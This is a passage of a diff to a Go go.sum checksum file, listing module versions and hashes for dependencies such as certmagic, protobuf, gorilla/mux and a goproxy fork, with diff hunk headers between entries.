github.com/caddyserver/certmagic v0.16.1 h1:rdSnjcUVJojmL4M0efJ+yHXErrrijS4YYg3FuwRdJkI=
|
||||
github.com/caddyserver/certmagic v0.16.1/go.mod h1:jKQ5n+ViHAr6DbPwEGLTSM2vDwTO6EvCKBblBRUvvuQ=
|
||||
github.com/cenkalti/backoff/v3 v3.0.0 h1:ske+9nBpD9qZsTBoF41nW5L+AIuFBKMeze18XQ3eG1c=
|
||||
github.com/cenkalti/backoff/v3 v3.0.0/go.mod h1:cIeZDE3IrqwwJl6VUwCN6trj1oXrTS4rc0ij+ULvLYs=
|
||||
github.com/census-instrumentation/opencensus-proto v0.2.0/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
|
||||
github.com/cespare/xxhash v1.1.0/go.mod h1:XrSqR1VqqWfGrhpAt58auRo0WTKS1nRRg3ghfAqPWnc=
|
||||
github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
|
||||
github.com/chzyer/logex v1.1.10 h1:Swpa1K6QvQznwJRcfTfQJmTE72DqScAa40E+fbHEXEE=
|
||||
github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI=
|
||||
github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e h1:fY5BOSpyZCqRo5OhCuC+XN+r/bBCmeuuJtjz+bCNIf8=
|
||||
@ -45,11 +82,9 @@ github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1 h1:q763qf9huN11kDQavWs
|
||||
github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1/go.mod h1:Q3SI9o4m/ZMnBNeIyt5eFwwo7qiLfzFZmjNmxjkiQlU=
|
||||
github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
|
||||
github.com/cloudflare/cloudflare-go v0.10.2/go.mod h1:qhVI5MKwBGhdNU89ZRz2plgYutcJ5PCekLxXn56w6SY=
|
||||
github.com/coreos/bbolt v1.3.2/go.mod h1:iRUV2dpdMOn7Bo10OQBFzIJO9kkE559Wcmn+qkEiiKk=
|
||||
github.com/coreos/etcd v3.3.10+incompatible/go.mod h1:uF7uidLiAD3TWHmW31ZFd/JWoc32PjwdhPthX9715RE=
|
||||
github.com/coreos/go-semver v0.2.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk=
|
||||
github.com/coreos/go-systemd v0.0.0-20190321100706-95778dfbb74e/go.mod h1:F5haX7vjVVG0kc13fIWeqUViNPyEJxv/OmvnBo0Yme4=
|
||||
github.com/coreos/pkg v0.0.0-20180928190104-399ea9e2e55f/go.mod h1:E3G3o1h8I7cfcXa63jLwjI0eiQQMgzzUDFVpN/nH/eA=
|
||||
github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc=
|
||||
github.com/cncf/udpa/go v0.0.0-20200629203442-efcf912fb354/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk=
|
||||
github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk=
|
||||
github.com/cpu/goacmedns v0.0.1/go.mod h1:sesf/pNnCYwUevQEQfEwY0Y3DydlQWSGZbaMElOWxok=
|
||||
github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsrgA7czyZG/E6dU=
|
||||
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
|
||||
@ -57,28 +92,35 @@ github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c
|
||||
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
|
||||
github.com/decker502/dnspod-go v0.2.0/go.mod h1:qsurYu1FgxcDwfSwXJdLt4kRsBLZeosEb9uq4Sy+08g=
|
||||
github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
|
||||
github.com/dgryski/go-sip13 v0.0.0-20181026042036-e10d5fee7954/go.mod h1:vAd38F8PWV+bWy6jNmig1y/TA+kYO4g3RSRF0IAv0no=
|
||||
github.com/dimchansky/utfbom v1.1.0/go.mod h1:rO41eb7gLfo8SF1jd9F8HplJm1Fewwi4mQvIirEdv+8=
|
||||
github.com/dnaeon/go-vcr v0.0.0-20180814043457-aafff18a5cc2/go.mod h1:aBB1+wY4s93YsC3HHjMBMrwTj2R9FHDzUr9KyGc8n1E=
|
||||
github.com/dnsimple/dnsimple-go v0.30.0/go.mod h1:O5TJ0/U6r7AfT8niYNlmohpLbCSG+c71tQlGr9SeGrg=
|
||||
github.com/eapache/go-resiliency v1.1.0/go.mod h1:kFI+JgMyC7bLPUVY133qvEBtVayf5mFgVsvEsIPBvNs=
|
||||
github.com/eapache/go-xerial-snappy v0.0.0-20180814174437-776d5712da21/go.mod h1:+020luEh2TKB4/GOp8oxxtq0Daoen/Cii55CzbTV6DU=
|
||||
github.com/eapache/queue v1.1.0/go.mod h1:6eCeP0CKFpHLu8blIFXhExK/dRa7WDZfr6jVFPTqq+I=
|
||||
github.com/elazarl/goproxy v0.0.0-20190911111923-ecfe977594f1 h1:yY9rWGoXv1U5pl4gxqlULARMQD7x0QG85lqEXTWysik=
|
||||
github.com/elazarl/goproxy v0.0.0-20190911111923-ecfe977594f1/go.mod h1:Ro8st/ElPeALwNFlcTpWmkr6IoMFfkjXAvTHpevnDsM=
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2 h1:dWB6v3RcOy03t/bUadywsbyrQwCqZeNIEX6M1OtSZOM=
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2/go.mod h1:gNh8nYJoAm43RfaxurUnxr+N1PwuFV3ZMl/efxlIlY8=
|
||||
github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
|
||||
github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
|
||||
github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98=
|
||||
github.com/envoyproxy/go-control-plane v0.9.7/go.mod h1:cwu0lG7PUMfa9snN8LXBig5ynNVH9qI8YYLbd1fK2po=
|
||||
github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk=
|
||||
github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c=
|
||||
github.com/exoscale/egoscale v0.18.1/go.mod h1:Z7OOdzzTOz1Q1PjQXumlz9Wn/CddH0zSYdCF3rnBKXE=
|
||||
github.com/fatih/color v1.7.0 h1:DkWD4oS2D8LGGgTQ6IvwJJXSL5Vp2ffcQg58nFV38Ys=
|
||||
github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
|
||||
github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w=
|
||||
github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk=
|
||||
github.com/fatih/structs v1.1.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M=
|
||||
github.com/fsnotify/fsnotify v1.4.7 h1:IXs+QLmnXW2CcXuY+8Mzv/fWEsPGWxqefPtCP5CnV9I=
|
||||
github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
|
||||
github.com/fsnotify/fsnotify v1.5.1 h1:mZcQUHVQUQWoPXXtuf9yuEXKudkV2sx1E06UadKWpgI=
|
||||
github.com/fsnotify/fsnotify v1.5.1/go.mod h1:T3375wBYaZdLLcVNkcVbzGHY7f1l/uK5T5Ai1i3InKU=
|
||||
github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
|
||||
github.com/go-acme/lego/v3 v3.1.0 h1:yanYFoYW8azFkCvJfIk7edWWfjkYkhDxe45ZsxoW4Xk=
|
||||
github.com/go-acme/lego/v3 v3.1.0/go.mod h1:074uqt+JS6plx+c9Xaiz6+L+GBb+7itGtzfcDM2AhEE=
|
||||
github.com/go-cmd/cmd v1.0.5/go.mod h1:y8q8qlK5wQibcw63djSl/ntiHUHXHGdCkPk0j4QeW4s=
|
||||
github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q=
|
||||
github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU=
|
||||
github.com/go-gl/glfw/v3.3/glfw v0.0.0-20191125211704-12ad95a8df72/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8=
|
||||
github.com/go-gl/glfw/v3.3/glfw v0.0.0-20200222043503-6f7a984d4dc4/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8=
|
||||
github.com/go-ini/ini v1.44.0/go.mod h1:ByCAeIL28uOIIG0E3PJtZPDL8WnHpFKFOtgjp+3Ies8=
|
||||
github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as=
|
||||
github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE=
|
||||
@ -87,40 +129,72 @@ github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/me
|
||||
github.com/gofrs/uuid v3.2.0+incompatible/go.mod h1:b2aQJv3Z4Fp6yNu3cdSllBxTCLRxnplIgP/c0N/04lM=
|
||||
github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
|
||||
github.com/gogo/protobuf v1.2.0/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
|
||||
github.com/gogo/protobuf v1.2.1/go.mod h1:hp+jE20tsWTFYpLwKvXlhS1hjn+gTNwPg2I6zVXpSg4=
|
||||
github.com/goji/httpauth v0.0.0-20160601135302-2da839ab0f4d/go.mod h1:nnjvkQ9ptGaCkuDUx6wNykzzlUixGxvkme+H/lnzb+A=
|
||||
github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
|
||||
github.com/golang/groupcache v0.0.0-20190129154638-5b532d6fd5ef/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/groupcache v0.0.0-20191227052852-215e87163ea7/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
|
||||
github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
|
||||
github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
|
||||
github.com/golang/mock v1.3.1/go.mod h1:sBzyDLLjw3U8JLTeZvSv8jJB+tU5PVekmnlKIyFUx0Y=
|
||||
github.com/golang/mock v1.4.0/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw=
|
||||
github.com/golang/mock v1.4.1/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw=
|
||||
github.com/golang/mock v1.4.3/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw=
|
||||
github.com/golang/mock v1.4.4/go.mod h1:l3mdAwkq5BuhzHwde/uurv3sEJeZMXNpwsxVWU71h+4=
|
||||
github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.3.2 h1:6nsPYzhq5kReh6QImI3k5qWzO4PEbvbIW2cwSfR/6xs=
|
||||
github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
|
||||
github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
|
||||
github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
|
||||
github.com/golang/protobuf v1.3.5/go.mod h1:6O5/vntMXwX2lRkT1hjjk0nAC1IDOTvTlVgjlRvqsdk=
|
||||
github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8=
|
||||
github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA=
|
||||
github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs=
|
||||
github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w=
|
||||
github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0=
|
||||
github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8=
|
||||
github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI=
|
||||
github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI=
|
||||
github.com/golang/snappy v0.0.0-20180518054509-2e65f85255db/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
|
||||
github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
|
||||
github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
|
||||
github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
|
||||
github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
|
||||
github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
|
||||
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.4.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck=
|
||||
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
|
||||
github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs=
|
||||
github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0=
|
||||
github.com/google/martian/v3 v3.1.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0=
|
||||
github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc=
|
||||
github.com/google/pprof v0.0.0-20190515194954-54271f7e092f/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc=
|
||||
github.com/google/pprof v0.0.0-20191218002539-d4f498aebedc/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200212024743-f11f1df84d12/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200229191704-1ebb73c60ed3/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200430221834-fc25d7d30c6d/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20200708004538-1a94d8640e99/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM=
|
||||
github.com/google/pprof v0.0.0-20201023163331-3e6fc7fc9c4c/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
|
||||
github.com/google/pprof v0.0.0-20201203190320-1bf35d6f28c2/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
|
||||
github.com/google/pprof v0.0.0-20201218002935-b9804c9f04c2/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE=
|
||||
github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI=
|
||||
github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
||||
github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
||||
github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg=
|
||||
github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk=
|
||||
github.com/googleapis/google-cloud-go-testing v0.0.0-20200911160855-bcd43fbb19e8/go.mod h1:dvDLG8qkwmyD9a/MJJN3XJcT3xFxOKAvTZGvuZmac9g=
|
||||
github.com/gophercloud/gophercloud v0.3.0/go.mod h1:vxM41WHh5uqHVBMZHzuwNOHh8XEoIEcSTewFxm1c5g8=
|
||||
github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY=
|
||||
github.com/gorilla/context v1.1.1/go.mod h1:kBGZzfjB9CEq2AlWe17Uuf7NDRt0dE0s8S51q0aT7Yg=
|
||||
github.com/gorilla/mux v1.6.2 h1:Pgr17XVTNXAk3q/r4CpKzC5xBM/qW1uVLV+IhRZpIIk=
|
||||
github.com/gorilla/mux v1.6.2/go.mod h1:1lud6UwP+6orDFRuTfBEV8e9/aOM/c4fVVCaMa2zaAs=
|
||||
github.com/gorilla/mux v1.7.3 h1:gnP5JzjVOuiZD07fKKToCAOjS0yOpj/qPETTXCCS6hw=
|
||||
github.com/gorilla/mux v1.7.3/go.mod h1:1lud6UwP+6orDFRuTfBEV8e9/aOM/c4fVVCaMa2zaAs=
|
||||
github.com/gorilla/websocket v1.4.0/go.mod h1:E7qHFY5m1UJ88s3WnNqhKjPHQ0heANvMoAMk2YaljkQ=
|
||||
github.com/grpc-ecosystem/go-grpc-middleware v1.0.0/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs=
|
||||
github.com/grpc-ecosystem/go-grpc-prometheus v1.2.0/go.mod h1:8NvIoxWQoOIhqOTXgfV/d3M/q6VIi02HzZEHgUlZvzk=
|
||||
github.com/grpc-ecosystem/grpc-gateway v1.8.5/go.mod h1:vNeuVxBJEsws4ogUvrchl83t/GYV9WGTSLVdBhOQFDY=
|
||||
github.com/grpc-ecosystem/grpc-gateway v1.9.0/go.mod h1:vNeuVxBJEsws4ogUvrchl83t/GYV9WGTSLVdBhOQFDY=
|
||||
github.com/h2non/parth v0.0.0-20190131123155-b4df798d6542/go.mod h1:Ow0tF8D4Kplbc8s8sSb3V2oUCygFHVp8gC3Dn6U4MNI=
|
||||
github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
@ -128,22 +202,28 @@ github.com/hashicorp/golang-lru v0.5.3/go.mod h1:iADmTwqILo4mZ8BN3D2Q6+9jd8WM5uG
|
||||
github.com/hashicorp/hcl v1.0.0 h1:0Anlzjpi4vEasTeNFn2mLJgTSwt0+6sfsiTG8qcWGx4=
|
||||
github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ=
|
||||
github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
|
||||
github.com/ianlancetaylor/demangle v0.0.0-20181102032728-5e5cf60278f6/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc=
|
||||
github.com/ianlancetaylor/demangle v0.0.0-20200824232613-28f6c0f3b639/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc=
|
||||
github.com/iij/doapi v0.0.0-20190504054126-0bbf12d6d7df/go.mod h1:QMZY7/J/KSQEhKWFeDesPjMj+wCHReeknARU3wqlyN4=
|
||||
github.com/inconshreveable/go-vhost v0.0.0-20160627193104-06d84117953b h1:IpLPmn6Re21F0MaV6Zsc5RdSE6KuoFpWmHiUSEs3PrE=
|
||||
github.com/inconshreveable/go-vhost v0.0.0-20160627193104-06d84117953b/go.mod h1:aA6DnFhALT3zH0y+A39we+zbrdMC2N0X/q21e6FI0LU=
|
||||
github.com/jmespath/go-jmespath v0.0.0-20180206201540-c2b33e8439af/go.mod h1:Nht3zPeWKUH0NzdCt2Blrr5ys8VGpn0CEB0cQHVjt7k=
|
||||
github.com/jonboulle/clockwork v0.1.0/go.mod h1:Ii8DK3G1RaLaWxj9trq07+26W01tbo22gdxWY5EU2bo=
|
||||
github.com/json-iterator/go v1.1.5/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
|
||||
github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
|
||||
github.com/json-iterator/go v1.1.7/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
|
||||
github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU=
|
||||
github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/XSXhF0NWZEnDohbsk=
|
||||
github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU=
|
||||
github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w=
|
||||
github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q=
|
||||
github.com/kgretzky/goproxy v0.0.0-20220622134552-7d0e0c658440 h1:2B7/pxomcOdEXRg1b40AkROGPkSn+uu31aAgoeKQtlQ=
|
||||
github.com/kgretzky/goproxy v0.0.0-20220622134552-7d0e0c658440/go.mod h1:Ro8st/ElPeALwNFlcTpWmkr6IoMFfkjXAvTHpevnDsM=
|
||||
github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
|
||||
github.com/klauspost/cpuid/v2 v2.1.0 h1:eyi1Ad2aNJMW95zcSbmGg7Cg6cq3ADwLpMAP96d8rF0=
|
||||
github.com/klauspost/cpuid/v2 v2.1.0/go.mod h1:RVVoqg1df56z8g3pUjL/3lE5UfnlrJX8tyFgg4nqhuY=
|
||||
github.com/kolo/xmlrpc v0.0.0-20190717152603-07c4ee3fd181/go.mod h1:o03bZfuBwAXHetKXuInt4S7omeXUu62/A845kiycsSQ=
|
||||
github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
|
||||
github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
|
||||
github.com/kr/fs v0.1.0/go.mod h1:FFnZGqtBN9Gxj7eW1uZ42v5BccTP0vu6NEaFoC2HwRg=
|
||||
github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc=
|
||||
github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI=
|
||||
github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
|
||||
@ -152,27 +232,33 @@ github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=
|
||||
github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
|
||||
github.com/labbsr0x/bindman-dns-webhook v1.0.2/go.mod h1:p6b+VCXIR8NYKpDr8/dg1HKfQoRHCdcsROXKvmoehKA=
|
||||
github.com/labbsr0x/goh v1.0.1/go.mod h1:8K2UhVoaWXcCU7Lxoa2omWnC8gyW8px7/lmO61c027w=
|
||||
github.com/libdns/libdns v0.2.1 h1:Wu59T7wSHRgtA0cfxC+n1c/e+O3upJGWytknkmFEDis=
|
||||
github.com/libdns/libdns v0.2.1/go.mod h1:yQCXzk1lEZmmCPa857bnk4TsOiqYasqpyOEeSObbb40=
|
||||
github.com/linode/linodego v0.10.0/go.mod h1:cziNP7pbvE3mXIPneHj0oRY8L1WtGEIKlZ8LANE4eXA=
|
||||
github.com/liquidweb/liquidweb-go v1.6.0/go.mod h1:UDcVnAMDkZxpw4Y7NOHkqoeiGacVLEIG/i5J9cyixzQ=
|
||||
github.com/magiconair/properties v1.8.0 h1:LLgXmsheXeRoUOBOjtwPQCWIYqM/LU1ayDtDePerRcY=
|
||||
github.com/magiconair/properties v1.8.0/go.mod h1:PppfXfuXeibc/6YijjN8zIbojt8czPbwD3XqdrwzmxQ=
|
||||
